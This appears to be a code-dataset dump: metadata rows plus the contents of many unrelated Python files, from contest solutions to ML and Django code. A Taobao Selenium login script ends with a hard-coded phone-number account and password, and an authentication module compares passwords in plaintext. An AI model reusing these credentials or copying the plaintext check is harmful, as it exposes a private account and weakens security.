blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6e3fa8511feac5e49a76f72bce10aae1e8c65edc
|
76e6d4f93078327fef8672133fc75a6f12abc240
|
/ABC113/C.py
|
61cb33095956fd32ac9d317c34bbae65700eecd4
|
[] |
no_license
|
adusa1019/atcoder
|
1e8f33253f6f80a91d069b2f3b568ce7a2964940
|
f7dbdfc021425160a072f4ce4e324953a376133a
|
refs/heads/master
| 2021-08-08T04:41:36.098678
| 2021-02-01T07:34:34
| 2021-02-01T07:34:34
| 89,038,783
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
import numpy as np
def solve(string):
n, m, *py = map(int, string.split())
py = [(_p, _y) for _p, _y in zip(py[0::2], py[1::2])]
p = [[] for _ in range(n)]
for _p, _y in py:
p[_p - 1].append(_y)
for i in range(n):
p[i] = np.argsort(np.argsort(p[i]))
counter = [0 for _ in range(n)]
ans = []
for _p, _y in py:
ans.append("{:06}{:06}".format(_p, p[_p - 1][counter[_p - 1]] + 1))
counter[_p - 1] += 1
return "\n".join(ans)
if __name__ == '__main__':
n, m = map(int, input().split())
print(solve("{} {}\n".format(n, m) + "\n".join([input() for _ in range(m)])))
|
[
"symphony20030829@yahoo.co.jp"
] |
symphony20030829@yahoo.co.jp
|
3dea3a1eb262af6d0fd57d983b6b19ebe8d4e017
|
a151a28de438a4214a14e5bf42a7761157f8e587
|
/stoq/plugins/decoder.py
|
5add552024bc67d4aaa07ff1a863c73f63adf3cf
|
[
"Apache-2.0"
] |
permissive
|
maydewd/stoq
|
f606f77c0dd38aeeb7e7ea48a840d8561ee18213
|
f72bbaf273640d645b8f9c20dc587e03373e24be
|
refs/heads/master
| 2021-06-21T20:34:51.885413
| 2018-05-18T12:03:15
| 2018-05-18T12:03:15
| 124,784,720
| 0
| 0
|
Apache-2.0
| 2018-03-11T18:14:34
| 2018-03-11T18:14:34
| null |
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
# Copyright 2014-2018 PUNCH Cyber Analytics Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from stoq.plugins.base import StoqPluginBase
class StoqDecoderPlugin(StoqPluginBase):
def decode(self):
pass
def to_bytearray(self, payload):
"""
Convert payload to a bytearray
:param bytes payload: Payload to be converted into byte array
:returns: Payload as a bytearray
:rtype: bytearray
"""
self.log.debug("Converting payload ({} bytes) to a bytearray".format(len(payload)))
if isinstance(payload, bytearray):
pass
elif isinstance(payload, bytes):
payload = bytearray(payload)
else:
payload = bytearray(payload.encode())
return payload
|
[
"marcus@randomhack.org"
] |
marcus@randomhack.org
|
84d8fb4c900688d98e3349cf4f0ad73513d2492e
|
f2ad830cea2c8a071601a94ffe1f6e1095436a05
|
/download.py
|
7d180127987be5df2f71fba8767d9af85790626a
|
[] |
no_license
|
naveenprolific/python
|
859b6cd7683a94597e5f6cbb07e9a12c1b594c11
|
c440f6b46b50d5f9e82966eed612d3ad7d4699f2
|
refs/heads/master
| 2021-01-25T11:40:30.928778
| 2019-08-17T06:11:19
| 2019-08-17T06:11:19
| 123,420,455
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
for i in range(int(input())):
n,k=map(int,input().split())
c=0
for i in range(n):
t,d=map(int,input().split())
if k>0:
if t>=k:
t-=k
k=0
else:
k-=t
t=0
c+=t*d
print(c)
|
[
"naveenlingerer12345@gmail.com"
] |
naveenlingerer12345@gmail.com
|
6922739fc57fda950b96b25e4975f0336ff70aad
|
fb33b689b8ebd54695828dab3f9d1db074203d34
|
/practice/mysite/blog/migrations/0001_initial.py
|
44a42493d1c554b4c29522a9c80df7b912f8a092
|
[] |
no_license
|
takumikaka/workspace
|
471ab6e60d47f61ae36e4b95e8d58b0840188f65
|
f72946ff5f46b549dfab51a0038f05478b301490
|
refs/heads/master
| 2021-05-06T11:58:24.334256
| 2019-03-22T08:32:18
| 2019-03-22T08:32:18
| 113,008,406
| 1
| 0
| null | 2018-02-23T12:28:54
| 2017-12-04T07:14:00
|
Python
|
UTF-8
|
Python
| false
| false
| 986
|
py
|
# Generated by Django 2.1 on 2018-01-09 02:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogArticles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('body', models.TextField()),
('publish', models.DateTimeField(default=django.utils.timezone.now)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-publish',),
},
),
]
|
[
"qk2006qk@163.com"
] |
qk2006qk@163.com
|
1d6fbb6576b0a599b201498124a372af35875ab6
|
f8e4ff05c94a8f1967fd0604ffcb1ae4e96b8feb
|
/mytest/login_taobao.py
|
ceb9de4a5bacc33ae5ad2c5038061fae0327366b
|
[] |
no_license
|
Cherry93/Myspider
|
d2d644612f4167ec13fea33e52ea810de3a3a639
|
ce5f821f2a2c26bba2c4b22c908cc65d07969b07
|
refs/heads/master
| 2021-04-09T10:40:34.320831
| 2018-03-16T09:57:13
| 2018-03-16T09:57:13
| 125,494,372
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,148
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import time
class loginTB(object):
def __init__(self):
self.driver = webdriver.Chrome()
self.driver.maximize_window()
# 设置一个智能等待
self.wait = WebDriverWait(self.driver,5)
def login(self,key,pw):
url = 'https://login.taobao.com/member/login.jhtml'
self.driver.get(url)
try:
# 寻找密码登陆按钮
login_links = self.wait.until(
EC.presence_of_element_located((By.XPATH,"//a[text()='密码登录']"))
)
login_links.click()
except TimeoutException as e:
print("找不到登陆入口,原因是:",e)
else:
# 输入账号密码
input_key = self.wait.until(
EC.presence_of_element_located((By.XPATH,"//input[@name='TPL_username']"))
)
input_pw = self.wait.until(
EC.presence_of_element_located((By.XPATH,"//input[@name='TPL_password']"))
)
input_key.clear()
input_pw.clear()
input_key.send_keys(key)
input_pw.send_keys(pw)
self.driver.find_element_by_xpath('//*[@id="J_SubmitStatic"]').click()
try:
# 试探能否找到个人信息,如果找不到说明登录失败
user_info = self.wait.until(
EC.presence_of_element_located((By.XPATH,"//div[@class='m-userinfo']"))
)
print('已经登陆成功,进入了个人中心')
except TimeoutException:
try:
self.driver.find_element_by_xpath("//div[@class='avatar-wrapper']")
print('已经登录成功,进入了淘宝网首页')
except:
try:
# 尝试找手机验证框,如果能找到说明要手机验证
frame = self.wait.until(
EC.presence_of_element_located((By.XPATH,'//div[@class="login-check-left"]/iframe'))
)
print('本次登录需要进行手机验证...')
except TimeoutException:
# 找不到手机验证说明密码账号输入错误,要重新输入
print('登录失败,目测是账号或密码有误,请检查后重新登录...')
key = input('请重新输入账号:').strip()
pw = input('请重新输入密码:').strip()
self.login(key,pw)
else:
self.driver.switch_to.frame(frame)
phone_num = self.wait.until(
EC.presence_of_element_located((By.XPATH,'//button[@id="J_GetCode"]'))
)
phone_num.click()
phone_key = input('请输入手机验证码:').strip()
key_send = self.wait.until(
EC.presence_of_element_located((By.XPATH,'//input[@id="J_Phone_Checkcode"]'))
)
key_send.send_keys(phone_key)
go_button = self.wait.until(
EC.presence_of_element_located((By.XPATH,'//input[@type="submit"]'))
)
go_button.click()
user_info = self.wait.until(
EC.presence_of_element_located((By.XPATH, "//div[@class='m-userinfo']"))
)
print('手机验证登陆成功!!!')
if __name__ == '__main__':
t = time.time()
l = loginTB()
l.login('18774389936','chensi710029')
print('登录完成,耗时{:.2f}秒'.format(float(time.time()-t)))
|
[
"358544104@qq.com"
] |
358544104@qq.com
|
6da539218ab518c0e6a9869cf1b56d4ad4487075
|
df1e54249446ba2327442e2dbb77df9931f4d039
|
/deprecated/parameters.py
|
07a7e876741747ba5a8d8f974567a383fe9fa1ac
|
[
"Apache-2.0"
] |
permissive
|
tarsqi/ttk
|
8c90ee840606fb4c59b9652bd87a0995286f1c3d
|
085007047ab591426d5c08b123906c070deb6627
|
refs/heads/master
| 2021-07-12T06:56:19.924195
| 2021-03-02T22:05:39
| 2021-03-02T22:05:39
| 35,170,093
| 26
| 12
|
Apache-2.0
| 2021-03-02T22:05:39
| 2015-05-06T16:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 1,425
|
py
|
class ParameterMixin:
"""Mixin class that provides access to elements in the parameter dictionary that lives on
Tarsqi and TarsqiDocument instances. This is where parameter defaults are specified."""
def getopt(self, option_name):
"""Return the option, use None as default."""
return self.parameters.get(option_name, None)
def getopt_genre(self):
"""Return the 'genre' user option. The default is None."""
return self.parameters.get('genre', None)
def getopt_source(self):
"""Return the 'source' user option. The default is None."""
return self.parameters.get('source', None)
def getopt_platform(self):
"""Return the 'platform' user option. The default is None."""
return self.parameters.get('platform', None)
def getopt_trap_errors(self):
"""Return the 'trap_errors' user option. The default is False."""
return self.parameters.get('trap-errors', True)
def getopt_pipeline(self):
"""Return the 'pipeline' user option. The default is None."""
return self.parameters.get('pipeline', None)
def getopt_extension(self):
"""Return the 'extension' user option. The default is ''."""
return self.parameters.get('extension', '')
def getopt_perl(self):
"""Return the 'perl' user option. The default is 'perl'."""
return self.parameters.get('perl', 'perl')
|
[
"marc@cs.brandeis.edu"
] |
marc@cs.brandeis.edu
|
3ac9bba729173c49f50ee9cee4b784b0ed5f4e2f
|
21cd0b41e987a131c4ef99969f40becabe815d9c
|
/data_uri.py
|
e9ace7c48d80f75569ddc4879c509aab3bbd3529
|
[] |
no_license
|
fake-name/wlnupdates
|
7412d0852b096a4c0bbbbc0b66fbb3a94103346e
|
95ed8d20e55f54ebfed10ec07d213eb71fb48e8a
|
refs/heads/master
| 2023-09-03T08:05:55.768504
| 2021-09-27T05:52:11
| 2021-09-27T05:52:11
| 33,464,882
| 33
| 6
| null | 2023-09-11T15:49:51
| 2015-04-06T03:26:11
|
Python
|
UTF-8
|
Python
| false
| false
| 1,507
|
py
|
import mimetypes
import re
import urllib
import base64
MIMETYPE_REGEX = r'[\w]+\/[\w\-\+\.]+'
_MIMETYPE_RE = re.compile('^{}$'.format(MIMETYPE_REGEX))
CHARSET_REGEX = r'[\w\-\+\.]+'
_CHARSET_RE = re.compile('^{}$'.format(CHARSET_REGEX))
DATA_URI_REGEX = (
r'data:' +
r'(?P<mimetype>{})?'.format(MIMETYPE_REGEX) +
r'(?:\;charset\=(?P<charset>{}))?'.format(CHARSET_REGEX) +
r'(?P<base64>\;base64)?' +
r',(?P<data>.*)')
_DATA_URI_RE = re.compile(r'^{}$'.format(DATA_URI_REGEX), re.DOTALL)
class DataURI(str):
def __new__(cls, *args, **kwargs):
uri = super(DataURI, cls).__new__(cls, *args, **kwargs)
uri._parse # Trigger any ValueErrors on instantiation.
return uri
def __repr__(self):
return 'DataURI(%s)' % (super(DataURI, self).__repr__(),)
def wrap(self, width=76):
return type(self)('\n'.join(textwrap.wrap(self, width)))
@property
def mimetype(self):
return self._parse[0]
@property
def charset(self):
return self._parse[1]
@property
def is_base64(self):
return self._parse[2]
@property
def data(self):
return self._parse[3]
@property
def _parse(self):
match = _DATA_URI_RE.match(self)
if not match:
raise ValueError("Not a valid data URI: %r" % self)
mimetype = match.group('mimetype') or None
charset = match.group('charset') or None
if match.group('base64'):
data = base64.b64decode(match.group('data').encode('utf-8'))
else:
data = urllib.unquote(match.group('data'))
return mimetype, charset, bool(match.group('base64')), data
|
[
"something@fake-url.com"
] |
something@fake-url.com
|
78adfeac2113a9117424cee5f1b68120915a0d96
|
3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be
|
/google-cloud-sdk/lib/googlecloudsdk/command_lib/container/azure/util.py
|
46a4126401b0bc61d927cafeba3008673d0a2ca7
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
twistedpair/google-cloud-sdk
|
37f04872cf1ab9c9ce5ec692d2201a93679827e3
|
1f9b424c40a87b46656fc9f5e2e9c81895c7e614
|
refs/heads/master
| 2023-08-18T18:42:59.622485
| 2023-08-15T00:00:00
| 2023-08-15T12:14:05
| 116,506,777
| 58
| 24
| null | 2022-02-14T22:01:53
| 2018-01-06T18:40:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,323
|
py
|
# -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command utilities for `gcloud container azure` commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
CLUSTERS_FORMAT = """
table(
name.segment(-1):label=NAME,
azureRegion,
controlPlane.version:label=CONTROL_PLANE_VERSION,
endpoint:label=CONTROL_PLANE_IP,
controlPlane.vmSize,
state)
"""
CLIENT_FORMAT = """
table(
name.segment(-1),
tenantId,
applicationId)
"""
NODE_POOL_FORMAT = """
table(name.segment(-1),
version:label=NODE_VERSION,
config.vmSize,
autoscaling.minNodeCount.yesno(no='0'):label=MIN_NODES,
autoscaling.maxNodeCount:label=MAX_NODES,
state)
"""
|
[
"gcloud@google.com"
] |
gcloud@google.com
|
3619cfbcab6dd50f85a2d36dcdb5282dc552ba16
|
6ed034d0a5e239d7b0c528b287451409ffb4a494
|
/mmpose/models/heads/topdown_heatmap_base_head.py
|
09646ead353fb054f066b9fc6816748a43287e2c
|
[
"Apache-2.0"
] |
permissive
|
ViTAE-Transformer/ViTPose
|
8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf
|
d5216452796c90c6bc29f5c5ec0bdba94366768a
|
refs/heads/main
| 2023-05-23T16:32:22.359076
| 2023-03-01T06:42:22
| 2023-03-01T06:42:22
| 485,999,907
| 869
| 132
|
Apache-2.0
| 2023-03-01T06:42:24
| 2022-04-27T01:09:19
|
Python
|
UTF-8
|
Python
| false
| false
| 3,956
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from abc import ABCMeta, abstractmethod
import numpy as np
import torch.nn as nn
from mmpose.core.evaluation.top_down_eval import keypoints_from_heatmaps
class TopdownHeatmapBaseHead(nn.Module):
"""Base class for top-down heatmap heads.
All top-down heatmap heads should subclass it.
All subclass should overwrite:
Methods:`get_loss`, supporting to calculate loss.
Methods:`get_accuracy`, supporting to calculate accuracy.
Methods:`forward`, supporting to forward model.
Methods:`inference_model`, supporting to inference model.
"""
__metaclass__ = ABCMeta
@abstractmethod
def get_loss(self, **kwargs):
"""Gets the loss."""
@abstractmethod
def get_accuracy(self, **kwargs):
"""Gets the accuracy."""
@abstractmethod
def forward(self, **kwargs):
"""Forward function."""
@abstractmethod
def inference_model(self, **kwargs):
"""Inference function."""
def decode(self, img_metas, output, **kwargs):
"""Decode keypoints from heatmaps.
Args:
img_metas (list(dict)): Information about data augmentation
By default this includes:
- "image_file: path to the image file
- "center": center of the bbox
- "scale": scale of the bbox
- "rotation": rotation of the bbox
- "bbox_score": score of bbox
output (np.ndarray[N, K, H, W]): model predicted heatmaps.
"""
batch_size = len(img_metas)
if 'bbox_id' in img_metas[0]:
bbox_ids = []
else:
bbox_ids = None
c = np.zeros((batch_size, 2), dtype=np.float32)
s = np.zeros((batch_size, 2), dtype=np.float32)
image_paths = []
score = np.ones(batch_size)
for i in range(batch_size):
c[i, :] = img_metas[i]['center']
s[i, :] = img_metas[i]['scale']
image_paths.append(img_metas[i]['image_file'])
if 'bbox_score' in img_metas[i]:
score[i] = np.array(img_metas[i]['bbox_score']).reshape(-1)
if bbox_ids is not None:
bbox_ids.append(img_metas[i]['bbox_id'])
preds, maxvals = keypoints_from_heatmaps(
output,
c,
s,
unbiased=self.test_cfg.get('unbiased_decoding', False),
post_process=self.test_cfg.get('post_process', 'default'),
kernel=self.test_cfg.get('modulate_kernel', 11),
valid_radius_factor=self.test_cfg.get('valid_radius_factor',
0.0546875),
use_udp=self.test_cfg.get('use_udp', False),
target_type=self.test_cfg.get('target_type', 'GaussianHeatmap'))
all_preds = np.zeros((batch_size, preds.shape[1], 3), dtype=np.float32)
all_boxes = np.zeros((batch_size, 6), dtype=np.float32)
all_preds[:, :, 0:2] = preds[:, :, 0:2]
all_preds[:, :, 2:3] = maxvals
all_boxes[:, 0:2] = c[:, 0:2]
all_boxes[:, 2:4] = s[:, 0:2]
all_boxes[:, 4] = np.prod(s * 200.0, axis=1)
all_boxes[:, 5] = score
result = {}
result['preds'] = all_preds
result['boxes'] = all_boxes
result['image_paths'] = image_paths
result['bbox_ids'] = bbox_ids
return result
@staticmethod
def _get_deconv_cfg(deconv_kernel):
"""Get configurations for deconv layers."""
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
output_padding = 1
elif deconv_kernel == 2:
padding = 0
output_padding = 0
else:
raise ValueError(f'Not supported num_kernels ({deconv_kernel}).')
return deconv_kernel, padding, output_padding
|
[
"annblessus@gmail.com"
] |
annblessus@gmail.com
|
542d08d969b7c6e3e26c5c442a28e8523898506c
|
9f02973cd0b8e7886085b7cff75b0f515ddf1a37
|
/关联分析_Apriori/src/process.py
|
1e7622e4f4b0eaeec5e077413859393a7aa7a059
|
[] |
no_license
|
damo894127201/MachineLearning
|
9c578628936ded8e4c26c232d6adabc58e09bf54
|
ca0d43c9ba8ff7d1353606ba893291e3bf10f9e7
|
refs/heads/master
| 2020-07-23T12:23:48.141435
| 2019-11-20T02:06:48
| 2019-11-20T02:06:48
| 207,554,934
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,343
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/11/12 22:32
# @Author : Weiyang
# @File : process.py
# =====================================================================================================================
# ../data/data.xlsx中,有两列:销售单明细 和 商品编码(脱过敏),其中每一行表示一条交易和一件商品
# 本模块的目的在于
# 将../data/data.xlsx数据转为 每一行表示一条交易事务,和该交易对应的所有商品序列,商品间以 , 隔开
# =====================================================================================================================
import pandas as pd
from collections import defaultdict
data = pd.read_excel('../data/data.xlsx',index=False)
transaction = defaultdict(set)
for id in data.index:
transaction[data.loc[id]['销售单明细']].add(data.loc[id]['商品编码'])
new_data = pd.DataFrame(index=range(len(transaction.keys())),columns=['销售单编号','商品编码序列'])
for id,key in enumerate(transaction.keys()):
new_data.loc[id]['销售单编号'] = key
new_data.loc[id]['商品编码序列'] = ','.join(list(transaction[key]))
# 写入到Excel表中,index表示是否需要行号,header表示是否需要列名等头部
new_data.to_excel('../data/transaction.xlsx',encoding='utf-8',index=False,header=True)
|
[
"894127201@qq.com"
] |
894127201@qq.com
|
99370e36489ef7f4845f09cd33b9ced5b2efaf53
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03449/s550276409.py
|
ab00968db82a9a7cac9c406ab8f2fc209d3c8fc8
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 626
|
py
|
import sys
from itertools import accumulate
read = sys.stdin.read
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)
INF = 1 << 60
MOD = 1000000007
def main():
N = int(readline())
A = list(map(int, readline().split()))
B = list(map(int, readline().split()))
A = list(accumulate(A))
B = list(accumulate(B))
ans = 0
for i in range(N):
if i > 0:
res = A[i] + B[-1] - B[i - 1]
else:
res = A[i] + B[-1]
if ans < res:
ans = res
print(ans)
return
if __name__ == '__main__':
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
21c4742ef0f3dc31ea373d154b5804b973be6cb7
|
c8b541ea4fa7d159b80bef116e5cd232ac61b8c1
|
/venv/Lib/test/test_tools/test_i18n.py
|
f9f787a64659c6a71eec015b4bfb7d735e5841c4
|
[] |
no_license
|
shengmenghui/knowledge_building
|
7a2d8eef040c2d3a45726b3a908be301e922024b
|
04fd7784f15535efed917cce44856526f1f0ce48
|
refs/heads/master
| 2022-12-31T14:18:05.282092
| 2020-10-23T02:51:37
| 2020-10-23T02:51:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,602
|
py
|
"""Tests to cover the Tools/i18n package"""
import os
import unittest
from sql_mode.support.script_helper import assert_python_ok
from sql_mode.test_tools import skip_if_missing, toolsdir
from sql_mode.support import temp_cwd
skip_if_missing()
class Test_pygettext(unittest.TestCase):
"""Tests for the pygettext.py tool"""
script = os.path.join(toolsdir,'i18n', 'pygettext.py')
def get_header(self, data):
""" utility: return the header of a .po file as a dictionary """
headers = {}
for line in data.split('\n'):
if not line or line.startswith(('#', 'msgid','msgstr')):
continue
line = line.strip('"')
key, val = line.split(':',1)
headers[key] = val.strip()
return headers
def test_header(self):
"""Make sure the required fields are in the header, according to:
http://www.gnu.org/software/gettext/manual/gettext.html#Header-Entry
"""
with temp_cwd(None) as cwd:
assert_python_ok(self.script)
with open('messages.pot') as fp:
data = fp.read()
header = self.get_header(data)
self.assertIn("Project-Id-Version", header)
self.assertIn("POT-Creation-Date", header)
self.assertIn("PO-Revision-Date", header)
self.assertIn("Last-Translator", header)
self.assertIn("Language-Team", header)
self.assertIn("MIME-Version", header)
self.assertIn("Content-Type", header)
self.assertIn("Content-Transfer-Encoding", header)
self.assertIn("Generated-By", header)
# not clear if these should be required in POT (template) files
#self.assertIn("Report-Msgid-Bugs-To", header)
#self.assertIn("Language", header)
#"Plural-Forms" is optional
def test_POT_Creation_Date(self):
""" Match the date format from xgettext for POT-Creation-Date """
from datetime import datetime
with temp_cwd(None) as cwd:
assert_python_ok(self.script)
with open('messages.pot') as fp:
data = fp.read()
header = self.get_header(data)
creationDate = header['POT-Creation-Date']
# peel off the escaped newline at the end of string
if creationDate.endswith('\\n'):
creationDate = creationDate[:-len('\\n')]
# This will raise if the date format does not exactly match.
datetime.strptime(creationDate, '%Y-%m-%d %H:%M%z')
|
[
"15173342800@163.com"
] |
15173342800@163.com
|
3d30d4cef2e2fc9de7bfc7194868bd42b35729a7
|
e3eead40e93fdf5186269536edefab4f08e9a5a2
|
/LeetCode/146-lru_cache.py
|
33438a65948643aeec344a5d8e2eef71f95d33bb
|
[] |
no_license
|
davll/practical-algorithms
|
bbc930b42363cae00ce39e8a686854c19131d334
|
0e35e4cc87bd41144b8e34302aafe776fec1b356
|
refs/heads/master
| 2021-08-22T13:12:34.555074
| 2020-03-28T08:56:13
| 2020-03-28T08:56:13
| 147,224,029
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,113
|
py
|
# https://leetcode.com/problems/lru-cache/
class LRUCache(object):
def __init__(self, capacity):
"""
:type capacity: int
"""
self._capacity = capacity
self._storage = {}
self._head = None
self._tail = None
def get(self, key):
"""
:type key: int
:rtype: int
"""
if key not in self._storage:
return -1
node = self._storage[key]
self._shift(node)
return node.value
def put(self, key, value):
"""
:type key: int
:type value: int
:rtype: void
"""
node = self._storage.get(key)
if node:
node.value = value
self._shift(node)
else:
node = Node(key, value)
self._storage[key] = node
self._append(node)
if len(self._storage) > self._capacity:
node = self._popleft()
del self._storage[node.key]
def _shift(self, node):
if node.prev:
node.prev.next = node.next
else:
self._head = self._head.next
if node.next:
node.next.prev = node.prev
else:
self._tail = self._tail.prev
node.next = node.prev = None
self._append(node)
def _append(self, node):
assert not node.prev
assert not node.next
if self._tail:
self._tail.next = node
node.prev = self._tail
self._tail = node
else:
self._head = node
self._tail = node
def _popleft(self):
head = self._head
self._head = self._head.next
self._head.prev = None
head.next = None
if not self._head:
self._tail = None
return head
class Node:
def __init__(self, key, value):
self.key = key
self.value = value
self.prev = None
self.next = None
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
|
[
"davll.xc@gmail.com"
] |
davll.xc@gmail.com
|
df5d0f9cd9fbd10df401ae6829425f78b699d912
|
e8c303ca35a1f6b231193518fa5924d9a4cff0f0
|
/frog-orchestrator/orchestrator_core/userAuthentication.py
|
aa0f5c430bbcb63000093d1e9dc37992329fae84
|
[] |
no_license
|
netgroup-polito/frog3
|
69187fa716fe4f93e0abea2e0df09f0dca2a721b
|
3ad63ac25dddd8ba4bd9ab958f3c418e513b4ac9
|
refs/heads/master
| 2021-01-10T07:06:07.598744
| 2016-04-12T16:28:40
| 2016-04-12T16:28:40
| 36,660,818
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,558
|
py
|
'''
Created on 18 set 2015
@author: Andrea
'''
from sql.user import User
from orchestrator_core.exception import unauthorizedRequest
class UserData(object):
def __init__(self, usr=None, pwd=None, tnt=None):
self.username = usr
self.password = pwd
self.tenant = tnt
def getUserID(self):
return User().getUser(self.username).id
def getUserData(self, user_id):
user = User().getUserFromID(user_id)
self.username = user.name
self.password =user.password
tenant = User().getTenantName(user.tenant_id)
self.tenant = tenant
class UserAuthentication(object):
def authenticateUserFromRESTRequest(self, request):
username = request.get_header("X-Auth-User")
password = request.get_header("X-Auth-Pass")
tenant = request.get_header("X-Auth-Tenant")
return self.authenticateUserFromCredentials(username, password, tenant)
def authenticateUserFromCredentials(self, username, password, tenant):
if username is None or password is None or tenant is None:
raise unauthorizedRequest('Authentication credentials required')
user = User().getUser(username)
if user.password == password:
tenantName = User().getTenantName(user.tenant_id)
if tenantName == tenant:
userobj = UserData(username, password, tenant)
return userobj
raise unauthorizedRequest('Invalid authentication credentials')
|
[
"stefanopet91@users.noreply.github.com"
] |
stefanopet91@users.noreply.github.com
|
dab19d4e555500f277957d95c0d1e3041bcaad0e
|
3b21cbe5320137a3d8f7da40558294081211f63f
|
/Chapter12/FrozenDeepQLearning.py
|
4910dba92203d7d02671ade946a3825a0a32ecd4
|
[
"MIT"
] |
permissive
|
Evelynatrocks/Python-Machine-Learning-Cookbook-Second-Edition
|
d06812bba0a32a9bd6e5e8d788769a07d28084cd
|
99d8b799dbfe1d9a82f0bcc3648aaeb147b7298f
|
refs/heads/master
| 2023-04-06T20:23:05.384943
| 2021-01-18T12:06:36
| 2021-01-18T12:06:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,065
|
py
|
import gym
import numpy as np
from keras.models import Sequential
from keras.layers.core import Dense, Reshape
from keras.layers.embeddings import Embedding
from keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import BoltzmannQPolicy
from rl.memory import SequentialMemory
ENV_NAME = 'FrozenLake-v0'
env = gym.make(ENV_NAME)
np.random.seed(1)
env.seed(1)
Actions = env.action_space.n
model = Sequential()
model.add(Embedding(16, 4, input_length=1))
model.add(Reshape((4,)))
print(model.summary())
memory = SequentialMemory(limit=10000, window_length=1)
policy = BoltzmannQPolicy()
Dqn = DQNAgent(model=model, nb_actions=Actions,
memory=memory, nb_steps_warmup=500,
target_model_update=1e-2, policy=policy,
enable_double_dqn=False, batch_size=512
)
Dqn.compile(Adam())
Dqn.fit(env, nb_steps=1e5, visualize=False, verbose=1, log_interval=10000)
Dqn.save_weights('dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)
Dqn.test(env, nb_episodes=20, visualize=False)
|
[
"joecasillas001@gmail.com"
] |
joecasillas001@gmail.com
|
04b413200d5c5c14c693f31cdea71096cfa5b87c
|
8dde6f201657946ad0cfeacab41831f681e6bc6f
|
/617_merger_two_binary_tree.py
|
29f9c56efed4c228638367c559ef7b02757f5f57
|
[] |
no_license
|
